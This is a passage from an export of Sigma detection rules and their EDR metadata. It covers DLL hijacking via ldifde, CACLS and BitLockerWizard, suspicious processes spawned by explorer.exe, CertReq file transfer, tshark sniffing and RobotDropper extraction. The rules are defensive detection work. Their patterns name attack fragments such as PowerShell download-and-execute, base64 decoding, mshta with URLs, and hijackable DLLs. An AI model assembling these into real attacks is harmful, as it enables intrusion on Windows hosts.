"content": "title: DLL Hijacking via ldifd.exe\nid: 2ffd5e79-150c-4383-847e-9e74ca72179a\ndescription: |\n Detects potential Windows DLL Hijacking via ldifd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ldifde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2ffd5e79-150c-4383-847e-9e74ca72179a",
"rule_name": "DLL Hijacking via ldifd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ldifd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3032fc60-f2f1-46ff-98c0-f6b537fe7513",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626639Z",
"creation_date": "2026-03-23T11:45:34.626641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626646Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1204/001/",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_001_suspicious_process_parent_explorer.yml",
"content": "title: Suspicious Process Started by Explorer\nid: 3032fc60-f2f1-46ff-98c0-f6b537fe7513\ndescription: |\n Detects the execution of suspicious processes spawned directly by explorer.exe, which commonly indicates that a user has clicked on a malicious link or attachment.\n This pattern is frequently observed in phishing attacks where malicious files or URLs trigger the execution of dangerous processes like powershell.exe, cmd.exe, or unusual script interpreters with explorer.exe as the parent.\n It is recommended to analyze the process command-line and file origin (by looking at the file downloads telemetry, for example).\nreferences:\n - https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1204/001/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2021/06/18\nmodified: 2026/01/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.001\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_explorer:\n ParentImage|endswith: '\\explorer.exe'\n\n # cmd.exe\n selection_cmd:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.Exe'\n\n selection_cmd_1_1:\n CommandLine|contains : '/c '\n\n selection_cmd_1_2:\n CommandLine|contains:\n - '%comspec% '\n - 'cmd.exe /c start '\n - 'cmd.exe /c ?start '\n - 'attrib '\n - 'mshta '\n - 'findstr '\n\n selection_cmd_2_1:\n CommandLine|contains: '/c '\n\n selection_cmd_2_2:\n CommandLine|contains:\n - 'powershell'\n - 'p^o^w^e^r^s^h^e^l^l'\n\n selection_cmd_2_3:\n CommandLine|contains:\n - 'bypass '\n - 'WriteAllbytes'\n - 'FromBase64String'\n - ' iex '\n\n exclusion_cmd:\n CommandLine|contains:\n - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '* ?:\\Windows\\system32\\ie4uinit.exe -ClearIconCache'\n - 'cmd.exe /c start cmd.exe /k pushd '\n - '?:\\Windows\\System32\\cmd.exe /c start shell:AppsFolder\\Microsoft.MicrosoftEdge_?????????????!MicrosoftEdge -private'\n - '?:\\Windows\\System32\\cmd.exe /c start /min /d ?:\\Users\\\\*\\AppData\\Local\\PDFProSuite PDFProSuite . --update'\n\n # powershell.exe\n selection_powershell_image:\n - Image|endswith: 'powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_powershell_commandline:\n CommandLine|contains:\n - 'DownloadFile'\n - 'DownloadString'\n - 'invoke-webrequest'\n - 'iwr'\n - '-join'\n - '-replace '\n - 'Start-Process rundll32'\n - 'Expand-Archive '\n - '::ReadAllBytes(*::WriteAllBytes('\n - ' -WindowStyle Hidden *Start-Process ?:\\' # C:\\\n - ' -WindowStyle Hidden *Start-Process ??:\\' # 'C:\\\n\n exclusion_powershell:\n CommandLine|contains:\n - ' Process Bypass '\n - ' -file ?:\\'\n - ' -file \"\\\\\\\\'\n - ' -command ?:\\'\n - \"}) -replace '\\\\s\\\\s+',\"\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy ByPass -NoExit -Command & ??:\\\\*\\anaconda3\\shell\\condabin\\conda-hook.ps1? ; conda activate ??:\\\\*\\anaconda3?'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy ByPass -NoExit -Command & ??:\\Users\\\\*\\Miniconda3\\shell\\condabin\\conda-hook.ps1? ; conda activate ??:\\\\*\\Miniconda3'\n - \"?:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command & '?:\\\\Program Files (x86)\\\\LastPass\\\\AppxUpgradeEdge.ps1'\"\n\n # mshta.exe\n selection_mshta_image:\n - Image|endswith: '\\mshta.exe'\n - OriginalFileName: 'MSHTA.EXE'\n\n selection_mshta_commandline:\n CommandLine|contains:\n - 'http'\n - 'javascript'\n\n # wmic.exe\n selection_wmic_image:\n - Image|endswith: 'wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_wmic_commandline:\n CommandLine|contains: 'format'\n\n # msiexec.exe\n selection_msiexec_image:\n - Image|endswith: 'msiexec.exe'\n - OriginalFileName: 'msiexec.exe'\n\n selection_msiexec_commandline:\n CommandLine|contains: '/q '\n\n # rundll32.exe\n selection_rundll32:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_rundll32_1:\n CommandLine|contains: '%comspec% '\n selection_rundll32_2:\n CommandLine|contains|all:\n - 'vfcuzzz.dll'\n - 'CuzzSetDebugLoweringPoint'\n selection_rundll32_3:\n CommandLine|contains|all:\n - 'KM.FileSystem.dll'\n - 'KMGetInterface'\n selection_rundll32_4:\n CommandLine|contains|all:\n - 'diassvcs.dll'\n - 'InitializeComponent'\n selection_rundll32_5:\n CommandLine|contains|all:\n - 'GraphicalComponent.dll'\n - 'VisualServiceComponent'\n selection_rundll32_6:\n CommandLine|contains|all:\n - 'MsDiskMountService.dll'\n - 'DiskDriveIni'\n selection_rundll32_7:\n CommandLine|contains|all:\n - 'advpack.dll'\n - 'RegisterOCX'\n selection_rundll32_8:\n CommandLine|contains|all:\n - '\\\\\\\\'\n - ',0'\n selection_rundll32_9:\n CommandLine|contains|all:\n - 'alomart.dll'\n - 'PluginInit'\n\n # wscript.exe\n selection_wscript_image:\n - Image|endswith: '\\wscript.exe'\n - OriginalFileName: 'wscript.exe'\n\n selection_wscript_commandline:\n CommandLine|contains: ' /b '\n\n # odbcconf.exe\n selection_odbcconf_image:\n - Image|endswith: '\\odbcconf.exe'\n - OriginalFileName: 'odbcconf.exe'\n\n selection_odbcconf_commandline:\n CommandLine|contains:\n - 'odbcconf '\n - 'odbcconf.exe '\n\n condition: selection_explorer and (\n (selection_cmd and (all of selection_cmd_1_* or all of selection_cmd_2_*) and not exclusion_cmd) or\n (all of selection_powershell_* and not exclusion_powershell) or\n (all of selection_mshta_*) or\n (all of selection_wmic_*) or\n (all of selection_msiexec_*) or\n (selection_rundll32 and 1 of selection_rundll32_*) or\n (all of selection_wscript_*) or\n (all of selection_odbcconf_*)\n )\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3032fc60-f2f1-46ff-98c0-f6b537fe7513",
"rule_name": "Suspicious Process Started by Explorer",
"rule_description": "Detects the execution of suspicious processes spawned directly by explorer.exe, which commonly indicates that a user has clicked on a malicious link or attachment.\nThis pattern is frequently observed in phishing attacks where malicious files or URLs trigger the execution of dangerous processes like powershell.exe, cmd.exe, or unusual script interpreters with explorer.exe as the parent.\nIt is recommended to analyze the process command-line and file origin (by looking at the file downloads telemetry, for example).\n",
"rule_creation_date": "2021-06-18",
"rule_modified_date": "2026-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.001",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "30336e99-9891-408e-b3a7-c5f83d445417",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603534Z",
"creation_date": "2026-03-23T11:45:34.603537Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603545Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Certreq",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_certreq_lolbas_file_transfer.yml",
"content": "title: File Downloaded or Uploaded via CertReq\nid: 30336e99-9891-408e-b3a7-c5f83d445417\ndescription: |\n Detects a suspicious execution of the CertReq executable to download or exfiltrate a file.\n Adversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\n It is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certreq\n - https://attack.mitre.org/techniques/T1105/\ndate: 2025/06/17\nmodified: 2025/06/17\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.CertReq\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\CertReq.exe'\n # Renamed binaries\n - OriginalFileName: 'CertReq.exe'\n\n selection_cmdline:\n CommandLine|contains|all:\n - '?Post'\n - '?config'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "30336e99-9891-408e-b3a7-c5f83d445417",
"rule_name": "File Downloaded or Uploaded via CertReq",
"rule_description": "Detects a suspicious execution of the CertReq executable to download or exfiltrate a file.\nAdversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\nIt is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\n",
"rule_creation_date": "2025-06-17",
"rule_modified_date": "2025-06-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3076adfe-ea41-40f9-84c8-262457ee7219",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594714Z",
"creation_date": "2026-03-23T11:45:34.594717Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594725Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cacls.yml",
"content": "title: DLL Hijacking via CACLS.exe\nid: 3076adfe-ea41-40f9-84c8-262457ee7219\ndescription: |\n Detects potential Windows DLL Hijacking via CACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ntmarta.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3076adfe-ea41-40f9-84c8-262457ee7219",
"rule_name": "DLL Hijacking via CACLS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "307b0642-85e4-4475-95de-240e2cbc5108",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618890Z",
"creation_date": "2026-03-23T11:45:34.618892Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618896Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bitlockerwizard.yml",
"content": "title: DLL Hijacking via BitLockerWizard.exe\nid: 307b0642-85e4-4475-95de-240e2cbc5108\ndescription: |\n Detects potential Windows DLL Hijacking via BitLockerWizard.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BitLockerWizard.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\fvewiz.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "307b0642-85e4-4475-95de-240e2cbc5108",
"rule_name": "DLL Hijacking via BitLockerWizard.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BitLockerWizard.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3085e5ea-4be0-4a6c-b0e8-442cc81ed08f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094233Z",
"creation_date": "2026-03-23T11:45:34.094235Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094239Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_network_sniffing_tshark_macos.yml",
"content": "title: Network Sniffed via tshark (macOS)\nid: 3085e5ea-4be0-4a6c-b0e8-442cc81ed08f\ndescription: |\n Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\n It is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\n It is recommended to investigate activity surrounding this alert to determine if the usage of this software is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/05/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Tshark\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/tshark'\n\n exclusion_cellar_data_analysis:\n ParentImage|endswith: 'opt/homebrew/Cellar/python@3.??/3.*/Frameworks/Python.framework/Versions/3.??/Resources/Python.app/Contents/MacOS/Python'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3085e5ea-4be0-4a6c-b0e8-442cc81ed08f",
"rule_name": "Network Sniffed via tshark (macOS)",
"rule_description": "Detects the execution of tshark, a protocol analyzer used to capture and analyze network traffic.\nIt is often used to help troubleshoot network issues, but adversaries can use it to sniff network traffic and capture information about an environment, including authentication material passed over the network.\nIt is recommended to investigate activity surrounding this alert to determine if the usage of this software is legitimate.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "309b6676-766c-4e8f-9570-9385f7522c2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604123Z",
"creation_date": "2026-03-23T11:45:34.604126Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604134Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2024/11/robotdropper-automates-delivery-of-multiple-infostealers",
"https://trac-labs.com/advancing-through-the-cyberfront-legionloader-commander-6af38ebe39d4"
],
"name": "t1560_001_unrar_decompress_robotdropper.yml",
"content": "title: RobotDropper Archiver Tool Execution\nid: 309b6676-766c-4e8f-9570-9385f7522c2e\ndescription: |\n Detects when the archiver tool WinRAR is used with arguments specific to RobotDropper.\n These parameters are used by threat actors to uncompress the password protected archive containing the payload.\n The payload is usually a Dll used for DLL Side-Loading.\nreferences:\n - https://blogs.blackberry.com/en/2024/11/robotdropper-automates-delivery-of-multiple-infostealers\n - https://trac-labs.com/advancing-through-the-cyberfront-legionloader-commander-6af38ebe39d4\ndate: 2025/01/08\nmodified: 2025/06/30\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.RobotDropper\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_rar:\n CommandLine|contains: '*\\AppData\\Roaming\\\\*\\unrar.exe x -p* -o+ *.rar'\n ParentImage: '?:\\Windows\\System32\\msiexec.exe'\n\n selection_7z:\n CommandLine|contains: '*\\AppData\\Roaming\\\\*\\7z.exe x *\\AppData\\Roaming\\\\* -oC*\\AppData\\Roaming\\\\* -y -p*'\n GrandparentImage: '?:\\Windows\\System32\\msiexec.exe'\n condition: 1 of selection_*\nlevel: high\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "309b6676-766c-4e8f-9570-9385f7522c2e",
"rule_name": "RobotDropper Archiver Tool Execution",
"rule_description": "Detects when the archiver tool WinRAR is used with arguments specific to RobotDropper.\nThese parameters are used by threat actors to uncompress the password protected archive containing the payload.\nThe payload is usually a Dll used for DLL Side-Loading.\n",
"rule_creation_date": "2025-01-08",
"rule_modified_date": "2025-06-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1560",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088132Z",
"creation_date": "2026-03-23T11:45:34.088134Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088138Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
